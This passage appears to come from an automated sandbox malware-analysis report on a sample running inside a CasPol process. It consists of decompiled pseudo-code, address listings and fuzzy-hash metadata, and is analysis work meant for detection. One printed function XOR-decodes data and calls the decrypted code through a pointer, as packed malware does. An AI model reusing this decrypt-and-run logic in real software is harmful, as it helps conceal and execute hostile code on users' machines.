							_v56 = 0x962e;
							_v54 = 8;
							asm("movq [ebp-0x31], xmm0");
							asm("movq [ebp-0x29], xmm0");
							_t106 = 0;
							do {
								 *(_t171 + _t106 - 0x3c) =  *(_t171 + _t106 - 0x3c) ^ 0x000000cb;
								_t106 = _t106 + 1;
							} while (_t106 < 0xb);
							_t107 = 0;
							_v8 = 0;
							if(_t168[0x4f] > 0) {
								do {
									_t165 = ( *(_t168 + _t107 + 0x24) & 0x000000ff) *  *_t168 + _t136;
									_t168[0x63] = _t165;
									asm("movq xmm0, [edi]");
									asm("movq [ebp-0x10], xmm0");
									asm("movq xmm0, [edi+0x8]");
									asm("movq [ebp-0x18], xmm0");
									asm("movq xmm0, [edi+0x10]");
									asm("movq [ebp-0x20], xmm0");
									asm("movq xmm0, [ebp-0x3c]");
									asm("movq [edi], xmm0");
									 *((short*)(_t165 + 8)) = _v56;
									 *((char*)(_t165 + 0xa)) = _v54;
									_v12 = _t165;
									 *(_t168[0x63])();
									asm("movq xmm0, [ebp-0x10]");
									asm("movq [edi], xmm0");
									asm("movq xmm0, [ebp-0x18]");
									asm("movq [edi+0x8], xmm0");
									asm("movq xmm0, [ebp-0x20]");
									asm("movq [edi+0x10], xmm0");
									_t166 = 0;
									if( *_t168 > 0) {
										_t138 = _v12;
										do {
											_t166 = _t166 + 1;
											 *(_t166 + _t138 - 1) =  *(_t166 + _t138 - 1) ^ _t168[0x86][0];
											_t153 = _t168[0x86][0] ^  *(_t166 + _t138 - 1) & 0x000000ff;
											 *(_t166 + _t138 - 1) = _t153;
											_t144 = _t168[0x86][0] ^ _t153;
											 *(_t166 + _t138 - 1) = _t144;
											 *(_t166 + _t138 - 1) =  *(_t168[0x86]) ^ _t144;
										} while (_t166 <  *_t168);
									}
									_t136 = _a4;
									_t107 = _v8 + 1;
									_v8 = _t107;
								} while (_t107 < _t168[0x4f]);
							}
							_t98 = E00401D80();
							_t151 = _t168[3];
							_t168[0x7a] = _t98;
							_t92 = _t98 - 2; // -2
							_t161 = _t92;
							if(_t151 != 0 && _t161 != 0 && _t151 < _t161) {
								_t141 = 0;
								_t162 = _t161 - _t151;
								if(_t162 != 0) {
									do {
										_t98 =  *((intOrPtr*)(_t141 + _t151 + 1)) + 0x61;
										 *(_t141 + _t151) =  *(_t141 + _t151) ^ _t98;
										_t141 = _t141 + 1;
									} while (_t141 < _t162);
								}
							}
						}
					}
				}
				return _t98;
			}






































                                                                        0x00401798
                                                                        0x0040179a
                                                                        0x0040179c
                                                                        0x004017a1
                                                                        0x004017a3
                                                                        0x004017aa
                                                                        0x004017b1
                                                                        0x004017b6
                                                                        0x004017bd
                                                                        0x004017be
                                                                        0x004017c7
                                                                        0x004017cd
                                                                        0x004017d5
                                                                        0x004017db
                                                                        0x004017e2
                                                                        0x004017e8
                                                                        0x004017ee
                                                                        0x004017f5
                                                                        0x004017f7
                                                                        0x004017f9
                                                                        0x004017ff
                                                                        0x00401802
                                                                        0x00401804
                                                                        0x00401807
                                                                        0x0040180f
                                                                        0x00401811
                                                                        0x00401817
                                                                        0x0040181a
                                                                        0x0040182c
                                                                        0x0040182e
                                                                        0x0040183b
                                                                        0x0040183d
                                                                        0x0040184c
                                                                        0x00401850
                                                                        0x00401811
                                                                        0x0040185e
                                                                        0x00401861
                                                                        0x00401863
                                                                        0x0040186d
                                                                        0x00401872
                                                                        0x00401875
                                                                        0x00401877
                                                                        0x0040187d
                                                                        0x00401880
                                                                        0x00000000
                                                                        0x00401882
                                                                        0x00401884
                                                                        0x00401886
                                                                        0x0040188a
                                                                        0x0040188a
                                                                        0x00401884
                                                                        0x00000000
                                                                        0x00401880
                                                                        0x0040188b
                                                                        0x00401892
                                                                        0x00401863
                                                                        0x00401896
                                                                        0x00401899
                                                                        0x004018a0
                                                                        0x004018a7
                                                                        0x004018ad
                                                                        0x004018b1
                                                                        0x004018b6
                                                                        0x004018bb
                                                                        0x004018c0
                                                                        0x004018c0
                                                                        0x004018c5
                                                                        0x004018c6
                                                                        0x004018cb
                                                                        0x004018cd
                                                                        0x004018d6
                                                                        0x004018e0
                                                                        0x004018ec
                                                                        0x004018ee
                                                                        0x004018f4
                                                                        0x004018fb
                                                                        0x00401900
                                                                        0x00401905
                                                                        0x0040190a
                                                                        0x0040190f
                                                                        0x00401914
                                                                        0x00401919
                                                                        0x0040191d
                                                                        0x00401924
                                                                        0x0040192d
                                                                        0x00401930
                                                                        0x00401932
                                                                        0x00401937
                                                                        0x0040193b
                                                                        0x00401940
                                                                        0x00401945
                                                                        0x0040194a
                                                                        0x00401952
                                                                        0x00401956
                                                                        0x00401958
                                                                        0x00401960
                                                                        0x00401966
                                                                        0x0040196a
                                                                        0x0040197c
                                                                        0x0040197e
                                                                        0x0040198b
                                                                        0x0040198d
                                                                        0x0040199b
                                                                        0x0040199f
                                                                        0x00401960
                                                                        0x004019a6
                                                                        0x004019a9
                                                                        0x004019aa
                                                                        0x004019ad
                                                                        0x004018e0
                                                                        0x004019b9
                                                                        0x004019be
                                                                        0x004019c1
                                                                        0x004019c7
                                                                        0x004019c7
                                                                        0x004019cc
                                                                        0x004019d6
                                                                        0x004019db
                                                                        0x004019dd
                                                                        0x004019e0
                                                                        0x004019e4
                                                                        0x004019e6
                                                                        0x004019e9
                                                                        0x004019ea
                                                                        0x004019e0
                                                                        0x004019dd
                                                                        0x004019cc
                                                                        0x004019ef
                                                                        0x004019f0
                                                                        0x004019f4

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: [[[@
                                                                        • API String ID: 0-1915900897
                                                                        • Opcode ID: bf2452841ec8a52e767ca0e35ee9d10767a69407195e395a6cf45bf687ade4d9
                                                                        • Instruction ID: 41084b55ac57c2d3c1eabc5a8f697687b7e59c0d76447f44c227e3c118e3a84d
                                                                        • Opcode Fuzzy Hash: bf2452841ec8a52e767ca0e35ee9d10767a69407195e395a6cf45bf687ade4d9
                                                                        • Instruction Fuzzy Hash: 8571BF71904B859BC712DF78C4D02EAFBF1FF9A300F14865AD4A9A7351D730A684CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004017A0 Relevance: 1.4, Strings: 1, Instructions: 177COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E004017A0(intOrPtr _a4, signed int _a8, signed int* _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v54;
				short _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed char _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				void* _t105;
				intOrPtr _t106;
				char _t122;
				signed int _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t139;
				void* _t140;
				signed char _t143;
				void* _t144;
				signed char _t147;
				signed int _t150;
				signed char _t152;
				signed char _t154;
				signed int _t156;
				intOrPtr _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				signed int _t164;
				void* _t165;
				signed int* _t167;
				void* _t169;
				void* _t170;

				if(_a4 == 0) {
					return _t97;
				}
				_t156 = _a8;
				if(_t156 == 0) {
					L27:
					return _t97;
				}
				_t167 = _a12;
				_t97 = _t167[0x7c] ^ _t167[0x78];
				_t133 =  &(_t167[0x78]);
				if(_t156 < _t97) {
					L26:
					goto L27;
				}
				_t99 = E00401D80();
				_t167[0x4f] = _t167[0x4f] ^  *_t133;
				_t139 = _t167[0x4f];
				_t167[3] = _t99;
				_t101 = _t156 / _t139;
				_t158 = 0;
				_t167[0x86] = _t133;
				_t135 = _a4;
				 *_t167 = _t101;
				_t102 = _t101 * _t139;
				_t167[0x68] = _t102;
				if(_t102 == 0) {
					L5:
					_t159 = 0;
					if(_t167[0x4f] == 1) {
						L12:
						asm("xorps xmm0, xmm0");
						_v64 = 0x5b27409e;
						_v60 = 0x405b5b5b;
						_v56 = 0x962e;
						_v54 = 8;
						asm("movq [ebp-0x31], xmm0");
						asm("movq [ebp-0x29], xmm0");
						_t105 = 0;
						do {
							 *(_t169 + _t105 - 0x3c) =  *(_t169 + _t105 - 0x3c) ^ 0x000000cb;
							_t105 = _t105 + 1;
						} while (_t105 < 0xb);
						_t106 = 0;
						_v8 = 0;
						if(_t167[0x4f] <= 0) {
							L20:
							_t97 = E00401D80();
							_t150 = _t167[3];
							_t167[0x7a] = _t97;
							_t92 = _t97 - 2; // -2
							_t160 = _t92;
							if(_t150 != 0 && _t160 != 0 && _t150 < _t160) {
								_t140 = 0;
								_t161 = _t160 - _t150;
								if(_t161 == 0) {
									goto L26;
								}
								do {
									_t97 =  *((intOrPtr*)(_t140 + _t150 + 1)) + 0x61;
									 *(_t140 + _t150) =  *(_t140 + _t150) ^ _t97;
									_t140 = _t140 + 1;
								} while (_t140 < _t161);
							}
							goto L26;
						}
						do {
							_t164 = ( *(_t167 + _t106 + 0x24) & 0x000000ff) *  *_t167 + _t135;
							_t167[0x63] = _t164;
							asm("movq xmm0, [edi]");
							asm("movq [ebp-0x10], xmm0");
							asm("movq xmm0, [edi+0x8]");
							asm("movq [ebp-0x18], xmm0");
							asm("movq xmm0, [edi+0x10]");
							asm("movq [ebp-0x20], xmm0");
							asm("movq xmm0, [ebp-0x3c]");
							asm("movq [edi], xmm0");
							 *((short*)(_t164 + 8)) = _v56;
							 *((char*)(_t164 + 0xa)) = _v54;
							_v12 = _t164;
							 *(_t167[0x63])();
							asm("movq xmm0, [ebp-0x10]");
							asm("movq [edi], xmm0");
							asm("movq xmm0, [ebp-0x18]");
							asm("movq [edi+0x8], xmm0");
							asm("movq xmm0, [ebp-0x20]");
							asm("movq [edi+0x10], xmm0");
							_t165 = 0;
							if( *_t167 <= 0) {
								goto L19;
							}
							_t137 = _v12;
							do {
								_t165 = _t165 + 1;
								 *(_t165 + _t137 - 1) =  *(_t165 + _t137 - 1) ^ _t167[0x86][0];
								_t152 = _t167[0x86][0] ^  *(_t165 + _t137 - 1) & 0x000000ff;
								 *(_t165 + _t137 - 1) = _t152;
								_t143 = _t167[0x86][0] ^ _t152;
								 *(_t165 + _t137 - 1) = _t143;
								 *(_t165 + _t137 - 1) =  *(_t167[0x86]) ^ _t143;
							} while (_t165 <  *_t167);
							L19:
							_t135 = _a4;
							_t106 = _v8 + 1;
							_v8 = _t106;
						} while (_t106 < _t167[0x4f]);
						goto L20;
					} else {
						goto L6;
					}
					do {
						L6:
						_t122 = L00401C40(1, _t167[0x4f] - 1);
						_t170 = _t170 + 8;
						_t144 = 0;
						while(_t122 !=  *((intOrPtr*)(_t167 + _t144 + 0x24))) {
							_t144 = _t144 + 1;
							if(_t144 <= _t159) {
								continue;
							}
							if(_t122 != 0) {
								 *((char*)(_t167 + _t159 + 0x24)) = _t122;
								_t159 = _t159 + 1;
							}
							goto L11;
						}
						L11:
					} while (_t159 < _t167[0x4f] - 1);
					goto L12;
				} else {
					goto L4;
				}
				do {
					L4:
					_t158 = _t158 + 1;
					 *(_t158 + _t135 - 1) =  *(_t158 + _t135 - 1) ^  *(_t167[0x86]);
					_t154 =  *(_t167[0x86] + 1) ^  *(_t158 + _t135 - 1) & 0x000000ff;
					 *(_t158 + _t135 - 1) = _t154;
					_t147 =  *(_t167[0x86] + 2) ^ _t154;
					 *(_t158 + _t135 - 1) = _t147;
					 *(_t158 + _t135 - 1) = _t167[0x86][0] ^ _t147;
				} while (_t158 < _t167[0x68]);
				goto L5;
			}





































                                                                        0x004017aa
                                                                        0x004019f4
                                                                        0x004019f4
                                                                        0x004017b1
                                                                        0x004017b6
                                                                        0x004019f0
                                                                        0x00000000
                                                                        0x004019f0
                                                                        0x004017be
                                                                        0x004017c7
                                                                        0x004017cd
                                                                        0x004017d5
                                                                        0x004019ee
                                                                        0x00000000
                                                                        0x004019ef
                                                                        0x004017db
                                                                        0x004017e2
                                                                        0x004017e8
                                                                        0x004017ee
                                                                        0x004017f5
                                                                        0x004017f7
                                                                        0x004017f9
                                                                        0x004017ff
                                                                        0x00401802
                                                                        0x00401804
                                                                        0x00401807
                                                                        0x0040180f
                                                                        0x00401858
                                                                        0x0040185e
                                                                        0x00401861
                                                                        0x00401896
                                                                        0x00401896
                                                                        0x00401899
                                                                        0x004018a0
                                                                        0x004018a7
                                                                        0x004018ad
                                                                        0x004018b1
                                                                        0x004018b6
                                                                        0x004018bb
                                                                        0x004018c0
                                                                        0x004018c0
                                                                        0x004018c5
                                                                        0x004018c6
                                                                        0x004018cb
                                                                        0x004018cd
                                                                        0x004018d6
                                                                        0x004019b9
                                                                        0x004019b9
                                                                        0x004019be
                                                                        0x004019c1
                                                                        0x004019c7
                                                                        0x004019c7
                                                                        0x004019cc
                                                                        0x004019d6
                                                                        0x004019db
                                                                        0x004019dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004019e0
                                                                        0x004019e4
                                                                        0x004019e6
                                                                        0x004019e9
                                                                        0x004019ea
                                                                        0x004019e0
                                                                        0x00000000
                                                                        0x004019cc
                                                                        0x004018e0
                                                                        0x004018ec
                                                                        0x004018ee
                                                                        0x004018f4
                                                                        0x004018fb
                                                                        0x00401900
                                                                        0x00401905
                                                                        0x0040190a
                                                                        0x0040190f
                                                                        0x00401914
                                                                        0x00401919
                                                                        0x0040191d
                                                                        0x00401924
                                                                        0x0040192d
                                                                        0x00401930
                                                                        0x00401932
                                                                        0x00401937
                                                                        0x0040193b
                                                                        0x00401940
                                                                        0x00401945
                                                                        0x0040194a
                                                                        0x00401952
                                                                        0x00401956
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401958
                                                                        0x00401960
                                                                        0x00401966
                                                                        0x0040196a
                                                                        0x0040197c
                                                                        0x0040197e
                                                                        0x0040198b
                                                                        0x0040198d
                                                                        0x0040199b
                                                                        0x0040199f
                                                                        0x004019a3
                                                                        0x004019a6
                                                                        0x004019a9
                                                                        0x004019aa
                                                                        0x004019ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401863
                                                                        0x00401863
                                                                        0x0040186d
                                                                        0x00401872
                                                                        0x00401875
                                                                        0x00401877
                                                                        0x0040187d
                                                                        0x00401880
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401884
                                                                        0x00401886
                                                                        0x0040188a
                                                                        0x0040188a
                                                                        0x00000000
                                                                        0x00401884
                                                                        0x0040188b
                                                                        0x00401892
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401811
                                                                        0x00401811
                                                                        0x00401817
                                                                        0x0040181a
                                                                        0x0040182c
                                                                        0x0040182e
                                                                        0x0040183b
                                                                        0x0040183d
                                                                        0x0040184c
                                                                        0x00401850
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: [[[@
                                                                        • API String ID: 0-1915900897
                                                                        • Opcode ID: 3bab81cb22c670ba8c2558139e2c5177ac26d8abfd67ee5da1f9d1a83d34915d
                                                                        • Instruction ID: 0579f95510c03a9841d28313c01d359dcd6b4f96fcd7d691669e6104c2243552
                                                                        • Opcode Fuzzy Hash: 3bab81cb22c670ba8c2558139e2c5177ac26d8abfd67ee5da1f9d1a83d34915d
                                                                        • Instruction Fuzzy Hash: 3671AF71904B859BC712DF78C0D02EAFBF1FF9A300F14865AD499A7351D730A585CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01480EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E01480EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0147FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01481074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E013F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0147A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0147A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x14a8b04 >> 0x14) + (_v44 -  *0x14a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E013D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0147138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E013D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0146FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x14a8724 & 0x00000008) != 0) {
						E014752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E014815B5(0x14a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                        0x01480eb7
                                                                        0x01480eb9
                                                                        0x01480ec0
                                                                        0x01480ec2
                                                                        0x01480ecd
                                                                        0x0148105b
                                                                        0x0148105b
                                                                        0x01481061
                                                                        0x01481066
                                                                        0x01481066
                                                                        0x0148106b
                                                                        0x01481073
                                                                        0x01481073
                                                                        0x01480ed3
                                                                        0x01480ed6
                                                                        0x01480edc
                                                                        0x01480ee0
                                                                        0x01480ee7
                                                                        0x01480ef0
                                                                        0x01480ef5
                                                                        0x01480efa
                                                                        0x01480efc
                                                                        0x01480efd
                                                                        0x01480f03
                                                                        0x01480f04
                                                                        0x01480f06
                                                                        0x01480f07
                                                                        0x01480f09
                                                                        0x01480f0e
                                                                        0x01480f14
                                                                        0x01480f23
                                                                        0x01480f2d
                                                                        0x01480f34
                                                                        0x01480f34
                                                                        0x01480f14
                                                                        0x01480f52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01480f58
                                                                        0x01480f73
                                                                        0x01480f74
                                                                        0x01480f79
                                                                        0x01480f7d
                                                                        0x01480f80
                                                                        0x01480f86
                                                                        0x01480fab
                                                                        0x01480fb5
                                                                        0x01480fc6
                                                                        0x01480fd1
                                                                        0x01480fe3
                                                                        0x01480fd3
                                                                        0x01480fdc
                                                                        0x01480fdc
                                                                        0x01480feb
                                                                        0x01481009
                                                                        0x01481009
                                                                        0x01481015
                                                                        0x01481027
                                                                        0x01481017
                                                                        0x01481020
                                                                        0x01481020
                                                                        0x0148102f
                                                                        0x0148103c
                                                                        0x0148103c
                                                                        0x01481048
                                                                        0x01481050
                                                                        0x01481050
                                                                        0x01481055
                                                                        0x00000000
                                                                        0x01481055
                                                                        0x01480f88
                                                                        0x01480f9e
                                                                        0x01480fa2
                                                                        0x01480fa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01480fa9
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 230ff72e9eeb84e8ce2a59ac7d9395654fcfa7d20ff309faf6da2a33b037db4f
                                                                        • Instruction ID: 8d3db9402ee063ee88acea601d3be4f263358102da70e10a4140090cc295988f
                                                                        • Opcode Fuzzy Hash: 230ff72e9eeb84e8ce2a59ac7d9395654fcfa7d20ff309faf6da2a33b037db4f
                                                                        • Instruction Fuzzy Hash: 6A51A0B13043429FE325EF19D890B5FBBE5EBC5704F04492EF696976A0D670E80AC762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E013EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E013D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E013F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E013F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E013F95D0();
							goto L11;
						} else {
							_t109 = L013D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E013FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E013F95D0();
										L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                        0x013ef0d3
                                                                        0x013ef0d9
                                                                        0x013ef0e0
                                                                        0x013ef0e7
                                                                        0x013ef0f2
                                                                        0x013ef0f4
                                                                        0x013ef0f8
                                                                        0x013ef100
                                                                        0x013ef108
                                                                        0x013ef10d
                                                                        0x013ef115
                                                                        0x013ef116
                                                                        0x013ef11f
                                                                        0x013ef123
                                                                        0x013ef124
                                                                        0x013ef12c
                                                                        0x013ef130
                                                                        0x013ef134
                                                                        0x013ef13d
                                                                        0x013ef144
                                                                        0x013ef14b
                                                                        0x013ef152
                                                                        0x0142bab0
                                                                        0x0142bab0
                                                                        0x013ef158
                                                                        0x013ef158
                                                                        0x013ef15a
                                                                        0x013ef160
                                                                        0x013ef165
                                                                        0x013ef166
                                                                        0x013ef16f
                                                                        0x013ef173
                                                                        0x0142baa7
                                                                        0x0142baa7
                                                                        0x0142baab
                                                                        0x00000000
                                                                        0x013ef179
                                                                        0x013ef18d
                                                                        0x013ef191
                                                                        0x0142baa2
                                                                        0x00000000
                                                                        0x013ef197
                                                                        0x013ef19b
                                                                        0x013ef1a2
                                                                        0x013ef1a9
                                                                        0x013ef1af
                                                                        0x013ef1b2
                                                                        0x013ef1b6
                                                                        0x013ef1b9
                                                                        0x013ef1c4
                                                                        0x013ef1d8
                                                                        0x013ef1df
                                                                        0x013ef1e3
                                                                        0x013ef1eb
                                                                        0x013ef1ee
                                                                        0x013ef1f4
                                                                        0x013ef20f
                                                                        0x0142bab7
                                                                        0x0142babb
                                                                        0x0142bacc
                                                                        0x0142bad1
                                                                        0x013ef215
                                                                        0x013ef218
                                                                        0x013ef226
                                                                        0x013ef22b
                                                                        0x00000000
                                                                        0x013ef22b
                                                                        0x013ef1f6
                                                                        0x013ef1f6
                                                                        0x013ef1f9
                                                                        0x013ef1fb
                                                                        0x013ef1fb
                                                                        0x013ef1f4
                                                                        0x013ef191
                                                                        0x013ef173
                                                                        0x013ef152
                                                                        0x013ef203

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction ID: 5768e717f73fe51f926af26d684478e9ee8c4924bcd4588ea1c0b5ae40d798e1
                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction Fuzzy Hash: 54516972504715ABC320DF29C840B6BBBF8FF58714F00892EFA95976A0E7B4E944CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01433540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E01433540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x14ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E013F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01433706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E013FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01433540;
						E013FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0140DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01440C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E013F97C0();
					}
					return E013FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01433971(0, _a4,  &_v352,  &_v1156);
